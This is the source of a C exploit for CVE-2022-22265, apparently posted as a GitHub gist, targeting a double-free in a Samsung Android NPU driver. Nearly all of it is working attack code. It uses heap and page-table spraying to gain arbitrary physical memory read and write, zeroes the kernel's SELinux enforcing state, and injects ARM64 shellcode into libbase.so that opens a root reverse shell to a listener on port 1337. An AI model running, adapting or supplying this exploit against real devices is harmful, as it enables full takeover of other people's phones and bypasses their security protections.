| char shellcode[287] = {0xff, 0x03, 0x03, 0xd1, 0xfd, 0x7b, 0x06, 0xa9, 0xfc, 0x6f, 0x07, 0xa9, 0xfa, 0x67, 0x08, 0xa9, 0xf8, 0x5f, 0x09, 0xa9, 0xf6, 0x57, 0x0a, 0xa9, 0xf4, 0x4f, 0x0b, 0xa9, 0xc8, 0x15, 0x80, 0xd2, 0x01, 0x00, 0x00, 0xd4, 0x1f, 0x00, 0x00, 0xf1, 0x01, 0x06, 0x00, 0x54, 0x00, 0x24, 0xa0, 0xf2, 0x01, 0x00, 0x80, 0xd2, 0x02, 0x00, 0x80, 0xd2, 0x03, 0x00, 0x80, 0xd2, 0x88, 0x1b, 0x80, 0xd2, 0x01, 0x00, 0x00, 0xd4, 0x1f, 0x00, 0x00, 0xf1, 0x01, 0x05, 0x00, 0x54, 0x40, 0x00, 0x80, 0xd2, 0x21, 0x00, 0x80, 0xd2, 0x02, 0x00, 0x80, 0xd2, 0xc8, 0x18, 0x80, 0xd2, 0x01, 0x00, 0x00, 0xd4, 0xf3, 0x03, 0x00, 0xaa, 0xe0, 0x03, 0x13, 0xaa, 0x01, 0x05, 0x00, 0x10, 0x02, 0x02, 0x80, 0xd2, 0x68, 0x19, 0x80, 0xd2, 0x01, 0x00, 0x00, 0xd4, 0xe0, 0x03, 0x13, 0xaa, 0x01, 0x00, 0x80, 0xd2, 0xe2, 0x03, 0x1f, 0xaa, 0x08, 0x03, 0x80, 0xd2, 0x01, 0x00, 0x00, 0xd4, 0xe0, 0x03, 0x13, 0xaa, 0x21, 0x00, 0x80, 0xd2, 0xe2, 0x03, 0x1f, 0xaa, 0x08, 0x03, 0x80, 0xd2, 0x01, 0x00, 0x00, 0xd4, 0xe0, 0x03, 0x13, 0xaa, 0x41, 0x00, 0x80, 0xd2, 0xe2, 0x03, 0x1f, 0xaa, 0x08, 0x03, 0x80, 0xd2, 0x01, 0x00, 0x00, 0xd4, 0xe0, 0x02, 0x00, 0x10, 0xf5, 0x03, 0x00, 0xaa, 0x16, 0x00, 0x80, 0xd2, 0xf5, 0x03, 0x00, 0xf9, 0xf6, 0x07, 0x00, 0xf9, 0xe1, 0x03, 0x00, 0x91, 0x02, 0x00, 0x80, 0xd2, 0xa8, 0x1b, 0x80, 0xd2, 0x01, 0x00, 0x00, 0xd4, 0x00, 0x00, 0x80, 0xd2, 0x01, 0x00, 0x80, 0xd2, 0xc8, 0x0b, 0x80, 0xd2, 0x01, 0x00, 0x00, 0xd4, 0xf4, 0x4f, 0x4b, 0xa9, 0xf6, 0x57, 0x4a, 0xa9, 0xf8, 0x5f, 0x49, 0xa9, 0xfa, 0x67, 0x48, 0xa9, 0xfc, 0x6f, 0x47, 0xa9, 0xfd, 0x7b, 0x46, 0xa9, 0xff, 0x03, 0x03, 0x91, 0xc0, 0x03, 0x5f, 0xd6, 0x02, 0x00, 0x05, 0x39, 0x7f, 0x00, 0x00, 0x01, 0x2f, 0x73, 0x79, 0x73, 0x74, 0x65, 0x6d, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00}; | |
| int main(int argc, char *argv[]) { | |
| pin_cpu(5); | |
| puts("[+] CVE-2022-22265"); | |
| ncpu = sysconf(_SC_NPROCESSORS_ONLN); | |
| /* set name process */ | |
| char *name = "exp1337"; | |
| prctl(PR_SET_NAME, name, 0, 0, 0); | |
| puts("[+] mmap pages to phys r/w"); | |
| /* mmap spray pte */ | |
| uint64_t addr = 0x20000; | |
| for (uint32_t i = 0; i < NUM_TABLE; i++) { | |
| for (uint32_t j = 0; j < NUM_PTE; j++) { | |
| if ((map[i][j] = mmap((void *) addr + (i * 0x200000) + (j * 0x1000), 0x1000, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_SHARED|MAP_FIXED, -1, 0)) == MAP_FAILED) { | |
| perror("[-] mmap()"); | |
| exit(0); | |
| } | |
| } | |
| } | |
| puts("[+] set num files"); | |
| /* set num files */ | |
| struct rlimit limit; | |
| limit.rlim_cur = 4096 * 8; | |
| limit.rlim_max = 4096 * 8; | |
| if (setrlimit(RLIMIT_NOFILE, &limit) != 0) { | |
| perror("[-] setrlimit()"); | |
| exit(0); | |
| } | |
| puts("[+] preparing pipe buffer"); | |
| /* pipe buffer to locating uaf */ | |
| for (int i = 0; i < MAX_PIPES; i++) { | |
| // pin_cpu(i % ncpu); | |
| if (pipe(pipefd[i]) < 0) { | |
| printf("[-] pipe: %d\n", errno); | |
| exit(0); | |
| } | |
| } | |
| puts("[+] alloc dmabuf"); | |
| /* dmabuff manager */ | |
| int dma_fd = open("/dev/dma_heap/system", O_RDONLY); | |
| if (dma_fd < 0) { | |
| puts("[-] couldn't open /dev/dma_heap/system"); | |
| exit(0); | |
| } | |
| memset(&data, 0x0, sizeof(struct dma_heap_allocation_data)); | |
| data.len = 0x1000; | |
| data.fd_flags = O_RDWR | O_CLOEXEC; | |
| int ret = ioctl(dma_fd, DMA_HEAP_IOCTL_ALLOC, &data); | |
| if (ret < 0) { | |
| printf("[-] couldn't ioctl dma heap alloc: %d", errno); | |
| exit(0); | |
| } | |
| puts("[+] mmap buffer to ncp object"); | |
| /* buffer ncp */ | |
| char *dma_buffer = mmap((void *) 0x10000, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED, data.fd, 0); | |
| if (dma_buffer == MAP_FAILED) { | |
| printf("[-] couldn't mmap: %d", errno); | |
| exit(0); | |
| } | |
| puts("[+] open /dev/vertex10"); | |
| /* driver vulnerable */ | |
| fd = open("/dev/vertex10", O_RDONLY); | |
| if (fd < 0) { | |
| puts("[-] couldn't open /dev/vertex10"); | |
| exit(0); | |
| } | |
| /* prepare graph */ | |
| prepare_graph(&user_data, &graph, &data); | |
| /* init ncp */ | |
| ncp = (struct ncp_header *) dma_buffer; | |
| av = (struct address_vector *) (ncp + 2); | |
| mv = (struct memory_vector *) (ncp + 3); | |
| init_ncp_header(ncp); | |
| /* do graph ioctl */ | |
| do_graph_ioctl(fd, ncp, av, mv, &graph, MEMORY_TYPE_OT_FMAP, 2); | |
| /* do format ioctl */ | |
| do_format_ioctl(fd, 2, VS4L_DIRECTION_IN, VS4L_DF_IMAGE_NPU); | |
| /* do graph ioctl */ | |
| do_graph_ioctl(fd, ncp, av, mv, &graph, MEMORY_TYPE_OT_FMAP, N); | |
| puts("[+] init signalfd spray to better cross cache"); | |
| /* init signalfd to better cross cache */ | |
| for (int i = 0; i < NUM_FILES; i++) { | |
| // pin_cpu(i % ncpu); | |
| mask.sig[0] = ~0; // | 0x40100 | |
| fd_init[i] = signalfd(-1, &mask, 0); | |
| if (fd_init[i] < 0) { | |
| printf("[-] signalfd: %d\n", errno); | |
| exit(0); | |
| } | |
| } | |
| uint32_t i = 0, fd_idx = 0, offset = 0; | |
| puts("[+] start signalfd cross cache"); | |
| /* start cross cache */ | |
| for (i = 0; i < (CPU_PARTIAL * OBJS_PER_SLAB); i++) { | |
| // pin_cpu(i % ncpu); | |
| mask.sig[0] = ~0; // | 0x40100 | |
| fd_cross[i] = signalfd(-1, &mask, 0); | |
| if (fd_cross[i] < 0) { | |
| printf("[-] signalfd: %d\n", errno); | |
| exit(0); | |
| } | |
| } | |
| offset = i; | |
| /* do format ioctl */ | |
| do_format_ioctl(fd, N, VS4L_DIRECTION_IN, 1337); | |
| puts("[+] getting vulnerable object (from signalfd)"); | |
| /* getting object vulnerable */ | |
| for (i = 0; i < MAX_SIGNAL; i++) { | |
| // pin_cpu(i % ncpu); | |
| mask.sig[0] = ~0; // | 0x40100 | |
| fd_cross[offset + i] = signalfd(-1, &mask, 0); | |
| if (fd_cross[offset + i] < 0) { | |
| printf("[-] signalfd: %d\n", errno); | |
| exit(0); | |
| } | |
| } | |
| /* do graph ioctl */ | |
| do_graph_ioctl(fd, ncp, av, mv, &graph, MEMORY_TYPE_OT_FMAP, N); | |
| /* do format ioctl */ | |
| do_format_ioctl(fd, 3, VS4L_DIRECTION_OT, VS4L_DF_IMAGE_NPU); | |
| puts("[+] ioctl streamon"); | |
| ret = ioctl(fd, VS4L_VERTEXIOC_STREAM_ON); | |
| if (ret < 0) { | |
| printf("[-] couldn't ioctl VS4L_VERTEXIOC_STREAM_ON: %d\n", errno); | |
| exit(0); | |
| } | |
| puts("[+] ioctl streamoff (double free)"); | |
| /* double free vulnerable object */ | |
| ret = ioctl(fd, VS4L_VERTEXIOC_STREAM_OFF); | |
| if (ret < 0) { | |
| printf("[-] couldn't ioctl VS4L_VERTEXIOC_STREAM_OFF: %d\n", errno); | |
| exit(0); | |
| } | |
| puts("[+] spray pipe_buffer"); | |
| /* spray pipe_buffer */ | |
| char buf[(2 << 12)]; | |
| for (int64_t i = 0; i < MAX_PIPES; i++) { | |
| // pin_cpu(i % ncpu); | |
| // The arg has to be pow of 2 | |
| if (fcntl(pipefd[i][1], F_SETPIPE_SZ, 4096 * 2) < 0) { | |
| printf("[-] fcntl: %d\n", errno); | |
| exit(0); | |
| } | |
| *(int64_t *) buf = i; | |
| if (write(pipefd[i][1], buf, (1 << 12) + 8) < 0) { | |
| printf("[-] write: %d\n", errno); | |
| exit(0); | |
| } | |
| } | |
| int pos = -1; | |
| uint64_t leak; | |
| char file[64] = {0}; | |
| char buffer[256] = {0}; | |
| puts("[+] locating vulnerable signalfd object (uaf)"); | |
| /* locating vulnerable object (uaf) */ | |
| for (uint32_t j = 0; j < MAX_SIGNAL; j++) { | |
| snprintf(file, 26, "/proc/self/fdinfo/%d", fd_cross[offset + j]); | |
| fd_read = open(file, O_RDONLY); | |
| if (fd_read < 0) { | |
| printf("[-] open: %d\n", errno); | |
| exit(0); | |
| } | |
| int n = read(fd_read, buffer, 72); | |
| if (n < 0) { | |
| printf("[-] read: %d\n", errno); | |
| exit(0); | |
| } | |
| if (strncmp(&buffer[47], "fffffffffffbfeff", 16)) { | |
| leak = ~strtoul(&buffer[47], (char **) NULL, 16); | |
| printf("[+] pipe_buffer->page leak: 0x%016lx\n", leak); | |
| printf("[+] pipe_buffer->page to virt: 0x%016lx\n", page_to_virt(leak, true)); | |
| printf("[+] pipe_buffer->page to virt to page: 0x%016lx\n", virt_to_page(page_to_virt(leak, true))); | |
| fd_idx = offset + j; | |
| break; | |
| } | |
| bzero(file, 26); | |
| bzero(buffer, 72); | |
| } | |
| if (fd_idx) { | |
| printf("[+] fd_signal found at %dth\n", fd_cross[fd_idx]); | |
| } else { | |
| puts("[-] Exploit failed :("); | |
| exit(0); | |
| } | |
| mask.sig[0] = ~(leak + 0x80); // | 0x40100 | |
| signalfd(fd_cross[fd_idx], &mask, 0); | |
| puts("[+] locating vulnerable object pipe_buffer (for cross cache)"); | |
| /* locating vulnerable object (cross cache) */ | |
| int c; | |
| for (int j = 0; j < MAX_PIPES; j++) { | |
| int n = read(pipefd[j][0], &c, 4); | |
| if (n < 0 || j != c) { | |
| printf("[+] pipe fd found at %dth\n", j); | |
| pos = j; | |
| break; | |
| } | |
| } | |
| if (pos == -1) { | |
| puts("[-] Exploit failed :("); | |
| exit(0); | |
| } | |
| puts("[+] free vulnerable object (from pipe_buffer)"); | |
| close(pipefd[pos][0]); // free vulnerable object | |
| close(pipefd[pos][1]); | |
| puts("[+] finishing cross cache"); | |
| /* emptying the page of the fd vulnerable */ | |
| for (i = 0; i < (CPU_PARTIAL * OBJS_PER_SLAB); i++) { | |
| close(fd_cross[i]); | |
| } | |
| /* discard slab */ | |
| for (i = 0; i < MAX_SIGNAL; i++) { | |
| if ((offset + i) != fd_idx) { | |
| close(fd_cross[offset + i]); | |
| } | |
| } | |
| puts("[+] spray page table"); | |
| /* spray PTE */ | |
| for (uint32_t i = 0; i < NUM_TABLE; i++) { | |
| for (uint32_t j = 0; j < NUM_PTE; j++) { | |
| *(uint32_t *) map[i][j] = (i * 0x200) + j; | |
| } | |
| } | |
| lseek(fd_read, 0, SEEK_SET); | |
| bzero(buffer, 72); | |
| int n = read(fd_read, buffer, 72); | |
| if (n < 0) { | |
| printf("[-] read: %d\n", errno); | |
| exit(0); | |
| } | |
| leak = ~strtoul(&buffer[47], (char **) NULL, 16); | |
| uint64_t flag = (leak & ((uint64_t) 0xfff << (13 * 4))); | |
| if ((flag >> (13 * 4)) != 0xe) { | |
| puts("[-] Exploit failed :("); | |
| exit(0); | |
| } | |
| printf("[+] phys leak 0x%016lx\n", leak); | |
| uint64_t pte_signalfd_restaure = leak; | |
| puts("[+] mmap buffer to manage tlb"); | |
| /* buffer to manage tlb */ | |
| full_tlb = mmap((void *) NULL, TLB * 0x1000, PROT_READ|PROT_WRITE, MAP_POPULATE|MAP_SHARED|MAP_ANONYMOUS, -1, 0); | |
| if (full_tlb == MAP_FAILED) { | |
| printf("[-] couldn't mmap: %d", errno); | |
| exit(0); | |
| } | |
| puts("[+] looking for page table and phys pte"); | |
| int32_t found = 0; | |
| leak = (leak + 0x1000) | 0x40100; | |
| mask.sig[0] = ~leak; // | 0x40100 | |
| signalfd(fd_cross[fd_idx], &mask, 0); | |
| /* replace tlb cache */ | |
| replace_tlb(); | |
| /* locate buffer */ | |
| char *evil = NULL; | |
| for (int i = 0; i < NUM_TABLE; i++) { | |
| for (int j = 0; j < NUM_PTE; j++) { | |
| if (*(uint64_t *) map[i][j] != ((i * 0x200) + j)) { | |
| found = 1; | |
| evil = map[i][j]; | |
| printf("[+] found distinct page at virtual 0x%lx\n", (uint64_t) evil); | |
| break; | |
| } | |
| } | |
| if (found) break; | |
| } | |
| if (!found) { | |
| puts("[-] Exploit failed :("); | |
| exit(0); | |
| } | |
| /* replace tlb cache */ | |
| replace_tlb(); | |
| uint64_t end; | |
| if ((leak & 0xfffffff43) >= 0x880000f43) { | |
| end = 0x980000f43; | |
| } else { | |
| end = 0x100000f43; | |
| } | |
| puts("[!] be patient now, looking for page table"); | |
| uint64_t *dump = (uint64_t *) evil; | |
| table_1: | |
| /* locate page table */ | |
| found = 0; | |
| uint64_t pte = 0; | |
| while (!found && (((leak | 0x40100) & 0xfffffff43) < end)) { | |
| /* replace tlb cache */ | |
| replace_tlb(); | |
| if ((dump[0] && ((dump[0] & ((uint64_t) 0xffff << (12 * 4))) == ((uint64_t) 0xe8 << (12 * 4))) | |
| && ((dump[0] & 0xfff) == 0xf43)) | |
| && (dump[1] && ((dump[1] & ((uint64_t) 0xffff << (12 * 4))) == ((uint64_t) 0xe8 << (12 * 4))) | |
| && ((dump[1] & 0xfff) == 0xf43))) { | |
| if ((dump[1] - dump[0]) == 0x1000) { | |
| pte = dump[0]; | |
| printf("[+] found page table at phys 0x%016lx and phys valid buffer pte 0x%016lx\n", leak, (uint64_t) pte); | |
| found = 1; | |
| break; | |
| } | |
| } | |
| /* replace tlb cache */ | |
| replace_tlb(); | |
| leak = (leak + 0x1000) | 0x40100; | |
| mask.sig[0] = ~leak; // | 0x40100 | |
| signalfd(fd_cross[fd_idx], &mask, 0); | |
| } | |
| if (!found) { | |
| puts("[-] Exploit failed :("); | |
| exit(0); | |
| } | |
| /* replace tlb cache */ | |
| replace_tlb(); | |
| puts("[+] looking for victim to migrate"); | |
| *(uint64_t *) evil = pte + 0x1000; | |
| /* replace tlb cache */ | |
| replace_tlb(); | |
| /* locate buffer to migrate and | |
| * manage page table to phys r/w | |
| */ | |
| found = 0; | |
| for (uint32_t i = 0; i < TLB; i++) { | |
| if (full_tlb[i * 512] != i && full_tlb[(i * 512) + 1] != i) { | |
| printf("[+] found victim to migrate at virtual buffer full_tlb 0x%lx\n", (uint64_t) (full_tlb + i * 512)); | |
| victim = (char *) (full_tlb + i * 512); | |
| found = 1; | |
| break; | |
| } | |
| } | |
| if (!found) { | |
| *(uint64_t *) evil = pte - 0x1000; | |
| puts("[*] fail * looking for another page table, continue being patient"); | |
| goto table_1; | |
| } | |
| /* replace tlb cache */ | |
| replace_tlb(); | |
| pmd[0] = (uint64_t) evil & ~0x1fffff; | |
| pmd[1] = (uint64_t) victim & ~0x1fffff; | |
| puts("[+] page table self pointer"); | |
| *(uint64_t *) evil = leak; | |
| puts("[+] munmap evil"); | |
| munmap(evil, 4096); | |
| /* replace tlb cache */ | |
| replace_tlb(); | |
| puts("[+] looking for victim page"); | |
| offset_pgt = 8; | |
| *(uint64_t *) (victim + offset_pgt) = pte; | |
| /* replace tlb cache */ | |
| replace_tlb(); | |
| /* locate buffer to manage phys r/w */ | |
| found = 0; | |
| page = NULL; | |
| for (uint32_t i = 0; i < TLB; i++) { | |
| if ((char *) (full_tlb + i * 512) == victim) continue; | |
| if (full_tlb[i * 512] != i && full_tlb[(i * 512) + 1] != i) { | |
| printf("[+] found victim page at virtual buffer full_tlb 0x%lx\n", (uint64_t) (full_tlb + i * 512)); | |
| page = (char *) (full_tlb + i * 512); | |
| found = 1; | |
| break; | |
| } | |
| } | |
| if (!found) { | |
| puts("[-] Exploit failed :("); | |
| exit(0); | |
| } | |
| /* replace tlb cache */ | |
| replace_tlb(); | |
| pmd[2] = (uint64_t) page & ~0x1fffff; | |
| puts("[+] looking for kernel phys"); | |
| /* search kernel phys base */ | |
| found = 0; | |
| uint32_t phys_base; | |
| for (uint64_t j = 0; j < 0x1000; j++) { | |
| /* replace tlb cache */ | |
| replace_tlb(); | |
| *(uint64_t *) (victim + offset_pgt) = (j * (1 << (3 * 4))) | MEMSTART | 0xe8000000000f43; | |
| /* replace tlb cache */ | |
| replace_tlb(); | |
| uint32_t magic = *(uint32_t *) (page + 0x38); | |
| if (magic == LINUX_ARM64_IMAGE_MAGIC) { | |
| phys_base = (j * (1 << (3 * 4))) | MEMSTART; | |
| printf("[+] kernel phys base at 0x%x\n", phys_base); | |
| found = 1; | |
| break; | |
| } | |
| } | |
| if (!found) { | |
| puts("[-] Exploit failed :("); | |
| exit(0); | |
| } | |
| /* replace tlb cache */ | |
| replace_tlb(); | |
| uint32_t phys_data = phys_base + KERNEL_DATA; | |
| uint32_t phys_off = phys_base & 0xffffff; | |
| uint64_t virt_kernel_base = VIRTUAL_KERNEL_START + phys_off; | |
| uint64_t init_task = virt_kernel_base + KERNEL_DATA + INIT_TASK + OFF_INIT_TASK; | |
| uint64_t selinux_state = virt_kernel_base + KERNEL_DATA + SELINUX_STATE + OFF_SELINUX_STATE; | |
| printf("[+] kernel phys offset 0x%x\n", phys_off); | |
| printf("[+] kernel phys data at 0x%x\n", phys_data); | |
| printf("[+] kernel virtual selinux_state at 0x%016lx\n", selinux_state); | |
| printf("[+] kernel virtual init_task at 0x%016lx\n", init_task); | |
| printf("[+] kernel virtual base at 0x%016lx\n", virt_kernel_base); | |
| puts("[+] go with selinux bypass"); | |
| /* disable selinux */ | |
| write16(selinux_state, 0); | |
| puts("[+] selinux enforcing patched"); | |
| /* open libbase.so */ | |
| int fd_libbase = open("/system/lib64/libbase.so", O_RDONLY); | |
| /* for getting info */ | |
| struct stat st; | |
| fstat(fd_libbase, &st); | |
| /* mmap libbase.so for injecting code */ | |
| char *libbase = mmap((void *) NULL, st.st_size, PROT_READ, MAP_SHARED|MAP_POPULATE, fd_libbase, 0); | |
| if (libbase == MAP_FAILED) { | |
| printf("[-] couldn't mmap: %d", errno); | |
| exit(0); | |
| } | |
| printf("[+] libbase.so mapped at 0x%lx\n", (uint64_t) libbase); | |
| pmd[3] = (uint64_t) libbase & ~0x1fffff; | |
| /* search logline function */ | |
| char *off = memmem(libbase, st.st_size, logline, 576); | |
| if (!off) { | |
| puts("[-] Exploit failed :("); | |
| exit(0); | |
| } | |
| printf("[+] LogLine found at 0x%lx\n", (uint64_t) off); | |
| /* replace tlb cache */ | |
| replace_tlb(); | |
| puts("[+] looking for process"); | |
| char comm[16]; | |
| uint64_t task = 0; | |
| uint64_t ptask = init_task; | |
| /* search current task */ | |
| while (task != init_task) { | |
| /* replace tlb cache */ | |
| replace_tlb(); | |
| task = read64(ptask + OFFSET_TASKS) - OFFSET_TASKS; | |
| *(uint64_t *)(comm) = read64(task + OFFSET_COMM); | |
| *(uint64_t *)(comm + 8) = read64(task + OFFSET_COMM + 8); | |
| printf("%016lx -> %s\n", task, comm); | |
| if (!strncmp(comm, "exp1337", 7)) { | |
| break; | |
| } | |
| /* | |
| int pid = read64(task + OFFSET_PID); | |
| if (pid == getpid()) | |
| break; | |
| */ | |
| ptask = task; | |
| } | |
| puts("[+] found current process"); | |
| /* search file table to stabilize */ | |
| uint64_t files = read64(task + OFFSET_FILES); | |
| uint64_t fdt = read64(files + OFFSET_FDT); | |
| uint64_t fd_array = read64(fdt + OFFSET_FD); | |
| printf("[+] current->files->fdt->fd 0x%016lx\n", fd_array); | |
| /* mmu walk */ | |
| uint64_t mm = read64(task + OFFSET_MM); | |
| uint64_t pgd = read64(mm + OFFSET_PGD); | |
| printf("[+] current->mm 0x%016lx\n", mm); | |
| printf("[+] current->mm->pgd 0x%lx\n", pgd); | |
| uint32_t offset_logline = (uint64_t) off & 0xfff; | |
| uint64_t offset_pte = get_directory((uint64_t) off >> (12 + 9 * 0)); | |
| uint64_t offset_pmd = get_directory((uint64_t) off >> (12 + 9 * 1)); | |
| uint64_t offset_pud = get_directory((uint64_t) off >> (12 + 9 * 2)); | |
| printf("[+] offset_logline 0x%x\n", offset_logline); | |
| printf("[+] offset_pud 0x%lx\n", offset_pud); | |
| printf("[+] offset_pmd 0x%lx\n", offset_pmd); | |
| printf("[+] offset_pte 0x%lx\n", offset_pte); | |
| uint64_t pud = read64(pgd + offset_pud * 8); | |
| printf("[+] pud 0x%lx\n", pud); | |
| uint64_t pmd = read64(phys_to_virt(((pud >> 12) << 12) & 0xffffffffff, true) + offset_pmd * 8); | |
| printf("[+] pmd 0x%lx\n", pmd); | |
| uint64_t pte_logline = read64(phys_to_virt(((pmd >> 12) << 12) & 0xffffffffff, true) + offset_pte * 8); | |
| printf("[+] pte_logline 0x%lx\n", pte_logline); | |
| /* replace tlb cache */ | |
| replace_tlb(); | |
| /* set the pte with permissions to inject code */ | |
| *(uint64_t *) (victim + offset_pgt) = (((pte_logline >> 12) << 12) & 0xffffffffff) | 0xe8000000000f43; | |
| /* replace tlb cache */ | |
| replace_tlb(); | |
| /* inject code */ | |
| memcpy(page + offset_logline, shellcode, 287); | |
| puts("[+] shellcode injected into LogLine"); | |
| puts("[+] execute nc -lp 1337 and press key here"); | |
| getc(stdin); | |
| puts("[+] trigger lpe"); | |
| int pid = fork(); | |
| if (!pid) { | |
| sleep(1); | |
| exit(139); | |
| } | |
| kill(pid, SIGSEGV); | |
| puts("[+] look at root reverse shell :)"); | |
| sleep(3); | |
| /* replace tlb cache */ | |
| replace_tlb(); | |
| /* set the pte with permissions to restaure code */ | |
| *(uint64_t *) (victim + offset_pgt) = (((pte_logline >> 12) << 12) & 0xffffffffff) | 0xe8000000000f43; | |
| /* replace tlb cache */ | |
| replace_tlb(); | |
| /* restaure code */ | |
| memcpy(page + offset_logline, logline, 287); | |
| puts("[+] LogLine function restaured"); | |
| puts("[+] clean up"); | |
| /* clean up signalfd */ | |
| write64(fd_array + fd_cross[fd_idx] * 8, 0); | |
| /* restaure ptes */ | |
| *(uint64_t *) victim = 0UL; | |
| *(uint64_t *) (victim + offset_pgt) = 0UL; | |
| /* clean up */ | |
| munmap(full_tlb, TLB * 0x1000); | |
| /* clean up */ | |
| for (uint32_t i = 0; i < NUM_TABLE; i++) { | |
| for (uint32_t j = 0; j < NUM_PTE; j++) { | |
| if (map[i][j] == evil) continue; | |
| munmap(map[i][j], 0x1000); | |
| } | |
| } | |
| puts("[+] finish"); | |
| exit(0); | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment